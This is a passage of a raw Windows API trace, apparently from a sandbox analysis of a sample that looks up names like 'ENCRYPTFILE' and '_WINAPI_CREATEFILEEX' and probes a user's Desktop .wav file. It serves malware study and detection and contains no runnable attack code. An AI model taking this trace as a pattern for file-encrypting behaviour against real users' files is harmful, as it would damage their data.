[0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0118.321] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0118.321] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0118.321] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0118.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0118.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0118.321] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0118.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0118.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7f98 [0118.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0118.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0118.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0118.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0118.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.322] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0118.323] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0118.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.323] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a8072b0, ftCreationTime.dwHighDateTime=0x1d5e2a8, ftLastAccessTime.dwLowDateTime=0xe074f000, ftLastAccessTime.dwHighDateTime=0x1d5ec4b, ftLastWriteTime.dwLowDateTime=0xe074f000, ftLastWriteTime.dwHighDateTime=0x1d5ec4b, nFileSizeHigh=0x0, nFileSizeLow=0x158aa, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="1YTxNPPGwWg.wav", cAlternateFileName="1YTXNP~1.WAV")) returned 0x41ac280 [0118.323] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0118.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0118.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0118.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392228 [0118.324] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0118.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392228 | out: hHeap=0x1780000) returned 1 [0118.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0118.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0118.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0118.324] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0118.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0118.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0118.324] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0118.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0118.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0118.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0118.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0118.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cc8 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0118.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0118.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0118.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0118.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0118.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0118.327] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0118.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 